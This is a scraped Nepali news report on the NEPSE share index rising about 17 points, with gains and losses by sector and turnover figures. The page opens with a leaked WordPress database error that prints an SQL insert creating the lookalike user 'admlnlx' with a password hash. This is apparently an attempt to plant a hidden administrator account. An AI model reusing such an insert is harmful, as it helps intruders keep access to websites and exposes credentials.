WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdxM/LqvhPrWhQyYp8NbxcIYNjtNjh.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:48:38', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १८ –
सोमबार ६५ अंकभन्दा बढीले घटेको शेयरबजार परिसुचक नेप्से मंगलबार बढेको छ । नेप्से मंगलबार झण्डै १७ अंकले बढेर १३ सय २६ दशमलव ६ विन्दुमा पुगेको हो ।
नेप्से सोमबार १३ सय ९ दशमलव ७० बिन्दुमा झरेको थियो । वीमा र अन्य बाहेकका सबै समूह उकालो लागेको दिन मंगलबार सवैभन्दा धेरै होटल समूह १ सय ९ दशमलव ७ बिन्दुले बढेको छ ।
त्यस्तै बंैकिङ २५ दशमलव ७७, उत्पादन १९ दशमलव ८२, जलविद्यूत १३ दशमलव १५, वित्त ९ दशमलव २, विकाश बंैक समूह ३ दशमलव ३२ समूहले बढेको छ । मंगलबार बीमा समूह भने २८ दशमलव ४२ र अन्य समूह शुन्य दशमलव शुन्य ४ विन्दुले घटेको छ । कारोबार रकम भने मंगलबार केही घटेको छ ।
सोमबार ५३ करोड ६६ लाखभन्दा धेरैको सेयर किनबेच भएकोमा मंगलबार ५२ करोड ८५ लाखभन्दा धेरैको कारोबार भएको छ । मंगलबार सवैभन्दा धेरै गरिमा विकास बैंकको संस्थापक शेयर ३ करोड ६८ लाखभन्दा धेरैको किनबेच भएको नेपाल स्टक एक्सचेञ्जले जनाएको छ ।